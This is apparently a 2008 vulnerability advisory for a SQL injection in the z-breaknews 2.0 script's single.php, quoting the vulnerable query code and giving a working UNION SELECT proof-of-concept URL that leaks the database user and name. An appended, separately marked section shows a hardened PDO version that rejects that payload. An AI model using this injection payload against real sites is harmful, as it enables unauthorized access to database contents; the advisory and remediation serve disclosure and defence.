# Title : z-breaknews 2.0 (single.php) Remote SQL Injection Vulnerability
# Published : 2008-08-26
# Author : cOndemned
########################################################################################
#
# Name : z-breaknews 2.0 (single.php) Remote SQL Injection Vulnerability
# Author : cOndemned [ Dark-Coders ]
# Greetz : Avantura, str0ke, ZaBeaTy, t0pP8uZz, 0in, suN8Hclf & All of my friends
#
########################################################################################
source of single.php :
[ ... ]
4. @mysql_select_db("$dbName")or die("???o ???????3 ?¢?±???‘?????? ?????§?3 ?¤???-?-?±?‘ ");
5. $row=mysql_fetch_array(mysql_query("SELECT * FROM $table WHERE id=".$_GET['id']));
6. echo $row['date'] ?></title>
[ ... ]
36. $row=mysql_fetch_array(mysql_query("SELECT * FROM $table WHERE id=".$_GET['id']));
[ ... ]
41. <td widht=100% ALIGN="left" valign='top'><h1>$row[date]</h1>
[ ... ]
proof of concept (the admin's login & password are not in the database, so... )
http://[host]/single.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database()),3,4,5/*
^ This will print requested information between <title> (line 6) and <h1> (line 41) tags
just 4 fun
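Added example (not part of the original advisory and not the project's own code): a hardened form of the lookup on lines 5 and 36, validating id as an integer, binding it as a parameter and encoding the value on output. The table name "news", its columns, the fetchArticle() helper and the in-memory SQLite database standing in for the script's MySQL database are assumptions made so that it runs without a server; the prepare/bind calls are the same with the PDO MySQL driver.

```php
<?php
declare(strict_types=1);

// Table names cannot be bound as parameters, so $table is checked against an allow-list.
const ALLOWED_TABLES = ['news']; // assumed table name, not taken from the advisory

// Hypothetical helper replacing: mysql_query("SELECT * FROM $table WHERE id=".$_GET['id'])
function fetchArticle(PDO $pdo, string $table, $rawId): ?array
{
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('unexpected table name');
    }
    // Accept only a positive decimal integer. Strings with extra SQL, arrays
    // (id[]=1) and a missing parameter all make filter_var() return false.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // The value travels as a bound integer and is never concatenated into the SQL text.
    $stmt = $pdo->prepare("SELECT * FROM $table WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in in-memory SQLite (stand-in for the MySQL database).
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, date TEXT, title TEXT, body TEXT, author TEXT)');
$pdo->exec("INSERT INTO news VALUES (1, '2008-08-26', 'Hello', 'Body', 'editor')");

// In single.php the input would be $_GET['id'] ?? null; these are constructed inputs,
// the second one being the id value from the proof of concept above, URL-decoded.
$inputs = ['1', '-1 UNION SELECT 1,concat_ws(0x3a,user(),database()),3,4,5/*', null];
foreach ($inputs as $rawId) {
    $row = fetchArticle($pdo, 'news', $rawId);
    // Encode on output too: the value is echoed inside <title> and <h1>.
    $date = $row === null
        ? 'not found'
        : htmlspecialchars((string) $row['date'], ENT_QUOTES, 'UTF-8');
    echo var_export($rawId, true), ' => ', $date, PHP_EOL;
}
```

Only the first input returns a row; the other two are rejected before any SQL is prepared.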